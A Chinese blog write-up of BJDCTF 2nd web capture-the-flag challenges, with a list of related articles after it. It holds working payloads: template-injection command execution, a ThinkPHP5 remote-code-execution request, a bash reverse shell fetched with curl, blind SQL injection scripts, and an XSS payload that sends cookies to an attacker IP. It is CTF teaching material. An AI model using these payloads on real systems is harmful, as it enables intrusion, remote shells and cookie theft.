[BJDCTF 2nd] WEB 简单题汇总

最新推荐文章于 2021-04-28 17:28:01 发布
最新推荐文章于 2021-04-28 17:28:01 发布
阅读量3.1k 收藏 6
点赞数 5
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/105123395
版权

Web简单题复现

看了看杂项的题目,我发现web的脑洞就是个弟弟

[BJDCTF 2nd]fake google

在这里插入图片描述
经过测试,存在xss和模板注入,这题是模板注入

方法一:

参考文献

在这里插入图片描述

<class ‘os._wrap_close’>,os命令相信你看到就感觉很亲切。我们正是要从这个类中寻找我们可利用的方法,通过大概猜测找到是第119个类,0也对应一个类,所以这里写[118]。
可以发现是存在这个类的
在这里插入图片描述
接下来用脚本跑索引

import requests

url ="http://67a8fe61-a3c7-42f4-85ae-f8e301bd7f30.node3.buuoj.cn/qaq"
temp={}
for i in range(1000):
    url = "http://537306c0-5737-4a8b-8db5-8fd5c2362b4f.node3.buuoj.cn/qaq?name={{\"\".__class__.__bases__[0].__subclasses__()[%d]}}" % i
    r = requests.get(url)
    print (url)
    print(r.text)
    if "os._wrap_close" in r.text:
        print(url)
        print(r.text)
        break

索引是117
接下来测试看看能不能命令执行
payload

{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('ls /').read()}}

在这里插入图片描述
成功查看根目录下文件,可以发现flag文件在根目录下,查看即可

方法二:

网上看到的第二个方法(其实就是写个python进去找索引,emmm,对于现在的我来说可能想不到这种注入,只能写脚本跑了)

{% for c in [].__class__.__base__.__subclasses__() %}
{%if%20c.__name__=='catch_warnings'%27'%}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}
{%endif%}
{% endfor %}


[BJDCTF 2nd]old-hack

在这里插入图片描述

题目已提示是thinkphp5,自行去搜thinkphp5的漏洞,会找到对应版本,
参考文献

根据参考文献
可得出payload:

get请求
s=captcha
post请求
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls /

在这里插入图片描述
查看根目录下的flag即可



[BJDCTF 2nd]duangShell

在这里插入图片描述

题目已提示是swp备份文件泄露
.index.php.swp 即可拿到备份源码
vim -r 打开 解析即可

<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>give me a girl</title>
</head>
<body>
    <center><h1>珍爱网</h1></center>
</body>
</html>
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
    die("where is P3rh4ps's girl friend ???");
} else {
    $girl = $_POST['];
    if (preg_match('/\>|\\\/', $girl)) {
        die('just girl');
    } else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
    } else {
        //duangShell~~~~
        exec($girl);
    }
}

emmmmm,过滤了很多东西,当时做到这无从下手,只能看web了,新知识,反弹shell,在buu上因为内网的原因,这题需要用内网开linux靶机,弄了比较长的时间
参考文献

因为exec()不会回显(之前一直琢磨怎么让他回显。。。)反弹shell能够解决而且又没有过滤curl。
先在/var/www/html,创建一个shell.txt文件
输入的命令为:

bash -i >& /dev/tcp/ip/port 0>&1

ip 为内网主机的ip地址,port为端口,随便输(这里以端口为2333为例)

再传post值

girl_friend=curl http://内网ip/shell.txt|bash

再nc

nc -lvp 2333

学到一个新指令

find / -name flag

找到flag所在目录查看即可

[BJDCTF 2nd]简单注入

在这里插入图片描述
首先先测试看看他过滤了啥
在这里插入图片描述
发现过滤了以下指令

union , select , = , ' , & , && , - ,  " , and

(当时看到分号被过滤了,顿时不想做了)

首先联合注入肯定是不行的,试了试报错注入,没有报错回显

考虑盲注(我构造的盲注语句好像不行,只能看web了)

方法一:

新知识(正则表达式注入)
参考文献
由于过滤了双引号,新东西:
BINARY 运算符将紧随其后的 string 转换为 二进制字符串
好像用二分法跑比较麻烦,只能遍历了。。。。。

import requests


url ="http://b688f906-6a48-48c8-af28-74052e3b3905.node3.buuoj.cn"
temp={}
password =""
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789']
a = '0x5e'

for i in range(100):
    for j in string:
        str = hex(j).replace('0x', '')
        # 查用户名
        username = "or username regexp binary %s #" % (a + str)
        print(username)
        data = {"username": "\\", "password": username}
        # 查密码
        #payload = "or password regexp binary %s #" % (a + str) 
        #print(payload)
        #data={"username" :"\\","password" : payload }
        r = requests.post(url,data=data)
        #print(r.text)
        if "BJD needs to be stronger" in r.text:
            password +=chr(j)
            print(password)
            a+=str
            break
    if "You konw ,P3rh4ps needs a girl friend" in r.text:
        break

print(password)

根据上面的查询到用户名以及密码,直接登录即可

方法二:

转义单引号
在这里插入图片描述
可以发现password逃逸出去了

payload:

password=or 1 #&username=admin\

在这里插入图片描述
输入进去可以发现下面的回显不一样了
payload:

password=^ (ascii(substr((password),1,1))>1)#&username=admin\

可以直接异或,长知识了

接下来上脚本:(二分法跑)

import requests
import time

url = "http://aed2ff9b-a59f-4192-94ce-362ee82b9d30.node3.buuoj.cn/index.php"
temp = {}
password = ""
for i in range(1,1000):
    time.sleep(0.06)
    low = 32
    high =128
    mid = (low+high)//2
    while(low<high):
        payload = '^ (ascii(substr((password),%d,1))>%d)#' % (i,mid)
        temp={"username":"admin\\","password": payload}
        r = requests.post(url,data=temp)
        print(low,high,mid,":")
        if "P3rh4ps" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    if(mid ==32 or mid ==127):
        break
    password +=chr(mid)
    print(password)


print("password=",password)

方法三:

时间盲注,
csdn参考文献

[BJDCTF 2nd]假猪套天下第一

在这里插入图片描述

刚开始以为是sql注入,后来抓包的时候看到了隐藏文件(访问源代码也可以)
在这里插入图片描述
有个 L0g1n.php的页面,进去看看,记得刷新一下页面
在这里插入图片描述
要修改时间,放到burp中,
起初以为是data,看到cookie里有个time的值,修改后
在这里插入图片描述
要从本地访问,有三种X-Forwarded-For,X-Forwarded-Host,CLIENT-IP,host
这里只能用CLIENT-IP或者X-Real-IP
剩下的不说了,就按照提示来就行了,改http头就行
参考文献
这里要说下Commodo 64这个浏览器,谷歌搜索
在这里插入图片描述
真正的名字是 Commodore 64
最后的http头如下
在这里插入图片描述
base64解密即可

[BJDCTF 2nd]Schrödinger

这题脑洞太大了
自行参考
在这里插入图片描述
可以发现隐藏了test.php,进去之后是一段登录,但是这题并不是要你sql注入
我们返回主页看看
在这里插入图片描述
主页的英文翻译提示我们可以爆破密码
将test.php放到下面input
再check抓包

在这里插入图片描述
可以发现cookie值多了个时间戳(base64解码即可得到)
将时间戳置空
在这里插入图片描述
弹出av号,去b站搜,评论区就有

[BJDCTF 2nd]xss之光

在这里插入图片描述

用kali自带的dirb扫描目录,发现是.git泄露
使用githack得到源码

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

没有类的情况下,可以进行原生类反序列化

参考文献
可以使用Exception类进行构造

$a = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($a));

赵老板赛后应该改了一下源码,这段js,我看别的web试出来了。
payload:

<?php
$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</script>"));
echo urlencode($a);
?>

返回抓包的时候发现弹出cookie
在这里插入图片描述

[BJDCTF 2nd]elementmaster

脑洞题

查看源代码,发现id的值不太对劲,进行十六进制转字符窜
Po.php进去之后啥都没有,看看图片,提到了放射性元素,Po刚好是化学元素
在这里插入图片描述
可能要我们遍历化学元素。。。。
(据说这道题是美国的一道原题改的,还改简单了)

接下来上我的垃圾脚本,

import requests
import time

list = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar','K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr', 'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
t =""
for i in list:
    url = "http://cfddf3d4-983f-4513-9a40-9f65cbcf45e4.node3.buuoj.cn/"
    time.sleep(0.06)
    i+=".php"
    print(i)
    url= url+i
    print(url)
    print('\n')
    r = requests.get(url)
    if r.status_code == 200:
        t += r.text
        print(t)

print(t)
url = "http://cfddf3d4-983f-4513-9a40-9f65cbcf45e4.node3.buuoj.cn/"
print(url+t)

跑出来后
在这里插入图片描述
进入链接即可

penson by 小乌
关注
专栏目录
[BJDCTF 2nd]简单注入 -wp
freerats的博客
07-17 548
拿到目,先扫一下目录 发现有robots.txt,里面提示了一个hint.txt。 select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 有一条后台查询语句 回到登入框处,尝试注入,发现加单双引号都被过滤 fuzz一下 长度为1414的都被过滤,包括select,and,=,等。 很明显联合注入用不了,报错注入无回显也不行。考虑盲注。 当username=admin&a.
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
xlcvv的博客
04-28 1628
进入目: swp文件,我第一次做CTF的时候就是swp泄露:[2019EIS高校运维赛]ezupload swp文件: 非正常关闭vi/vim编辑器时会生成一个.swp文件 关于swp文件 使用vi/vim,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件 以备不测(不测下面讨论),如果你正常退出,那么这个这个sw...
[BJDCTF 2nd]简单注入
qq_43801002的博客
08-01 451
目 过程 1.username=admin,password=123 2.username=admin’,password=123 3.没有什么提示,扫描目录试试,发现hint.txt,发现后端过滤语句。 倘若转义username后面第一个单引号,使$_POST前面的单引号与password=后面的单引号闭合,便可以逃逸此单引号后面的内容。 select * from users where username='$_POST["username"]' and password='$_POST["pa
[BUUCTF]REVERSE——[BJDCTF 2nd]guessgame
mcmuyanga的博客
10-29 290
[BJDCTF 2nd]guessgame 附件 步骤: 例行查壳儿,64位程序,没有壳儿 64位ida载入,习惯性的检索程序里的字符串,看到了一串类似flag的字符串,拿去提交,成功 BJD{S1mple_ReV3r5e_W1th_0D_0r_IDA}
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
BJDCTF 2nd–TARGZ
12-21
,tar没用,不需要爆破 下载附件得到tar.gz压缩包 查看16进制的时候发现是PK的头,对应的目的提示tar不好使(就是不tar压缩的) ...发现可以解压但是得到的还是压缩包,继续重复操作… 当时我解了半小时(时间沉dedao...
[BJDCTF 2nd] web-fake google
BROTHERYY的博客
07-09 232
复现环境:buuoj.cn 根据提示知道是ssti模板注入,使用tplmap进行注入。 发现存在代码执行 tplmap在github上下载,好像只能用py2运行,我在py3运行会报错 查看flag flag{9d83b5bd-72fd-468e-93a6-90237a167245}
[BJDCTF 2nd]简单注入(过滤了引号,利用\逃逸sql语句第二字段)
qq_45521281的博客
04-28 1372
进入后页面: 看看后台用什么闭合的,测试单引号: 发现直接就给你过滤了。试试还过滤了什么,发现过滤了以下指令: (这个方法挺巧的) union , select , = , ' , & , && , - , " , and 连引号都过滤了,这可怎么做啊。 看看又什么提示,源码里面啥也没有,扫描一下发现robots.txt: 发现了hint.txt提示,访问看看: ...
[BJDCTF 2nd]简单注入【Bool+Regexp注入】
D.MIND 的博客
04-28 467
这道跟之前做的 [NCTF2019]SQLi 十分相像,不过之前写的盲注脚本不大好,没有区分大小写 文章目录Regexp注入布尔盲注脚本 首先fuzz一下,主要过滤了union、select 、单引号、双引号、if、=、like 但是值得庆幸空格、or、注释符 没被过滤(虽然过滤了也能绕) 本有个hint可以通过robots.txt发现 Only u input the correct password then u can get the flag and p3rh4ps wants a girl f
[BJDCTF 2nd]简单注入 详细wp
weixin_45887311的博客
07-28 694
又开始刷SQL注入的目,从这道简单注入下手 首先没找到提示。。。。。。最后看了一下wp才发现有个hint.txt 有后端语句比较好构造了,结果又过滤,要fuzz探测一下 发现select还有 ' "都被过滤了 幸好空格和反斜杠没有被过滤。。。。 fuzz.txt (可以自己添加) select from ascii substr table column by schema where extractvalue exp if / ( ) % ! @ # $ ^ &...
[BJDCTF 2nd]简单注入---关于整数型注入的一些理解
StevenOnesir的博客
12-30 354
本次以BJDCTF目,简单对整数型注入做一些讲解。 首先进入界面: 看到的是比较友善的登录界面,考虑目名称为简单注入,我们直接在密码栏输入 ',发现被过滤。 因此开始考虑整数型注入。 既然闭合了引号防止闭合,这里我们可以猜测后端代码,结合用户名输入进行注入。 在用户名中输入\,可以过滤掉用户名处的最后一个',这是password='这部分的第一个引号将会作为前面字符段的闭合,就可以构造整数型注入。 我们构建第一个payload: username=a password=1 or length(da
BJDCTF 2nd]最简单的misc-y1ng
weixin_44110537的博客
07-26 1013
1拿到一个压缩包发现似乎加密了,但是目并没有给我们其它信息,所以猜测是伪加密。想在kali里直接打开,但是奇怪的是提示打开失败。 可是查看文件信息发现并没有加密 于是用winhex修改数据。得到文件 记事本打开后发现乱码 于是继续winhex打开 发现少了png的文件头。 于是添加上去(复制粘贴) 然后保存得到png图片 旋转后hex解码 ...
Buuctf-misc-[BJDCTF 2nd]最简单的misc-y1ng 1
m0_53932372的博客
03-04 241
y1ng师傅说是最简单的misc,我却还要看大佬wp才能解… 我真菜。 这道的解法: 需要输入密码,可能是伪加密。 伪加密实锤了。 (以后也可以用这种方法来判断文件是不是伪加密) 于是用010打开,修改: 09改为00。 再打开发现乱码: 解压放进010里面,发现结尾出现png的尾部字符: 而文件头缺失了,需要填补上。 填补上89 50 4e 47后,保存为secret.png,我发现我还是打不开。 (应该是可以打开的,后来我也直接加后缀打开了,但当时就是打不开) 后来用win10画图打开,发现图片:
Rails 2nd Edition: Agile Web Development抢先读
"Agile Web Development with Rails 2nd ed.pdf" 这本PDF电子书是《Agile Web Development with Rails》的英文第二版,专为敏捷开发者设计,它详细介绍了如何使用Ruby on Rails框架进行敏捷的Web应用开发。Ruby on ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值